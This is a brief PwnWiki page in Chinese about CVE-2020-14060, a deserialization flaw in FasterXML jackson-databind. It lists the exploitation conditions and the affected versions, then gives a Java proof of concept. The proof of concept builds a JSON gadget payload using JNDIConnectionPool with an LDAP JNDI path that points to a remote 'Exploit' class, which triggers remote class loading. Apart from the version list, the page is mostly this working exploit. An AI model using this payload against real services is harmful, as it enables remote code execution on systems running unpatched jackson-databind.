CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞

From PwnWiki
This page is a translated version of the page CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

利用条件

开启enableDefaultTyping()

使用了org.apache.drill.exec:drill-jdbc-all第三方依赖

影响版本

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

POC

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Poc {
   public static void main(String[] args) throws Exception {
       ObjectMapper mapper = new ObjectMapper();
       mapper.enableDefaultTyping();
       String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
       try {
           Object obj = mapper.readValue(payload, Object.class);
           mapper.writeValueAsString(obj);
       } catch (IOException e) {
           e.printStackTrace();
       }
   }
}
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-14060_FasterXML_jackson-databind_反序列化漏洞/zh-cn&oldid=5243"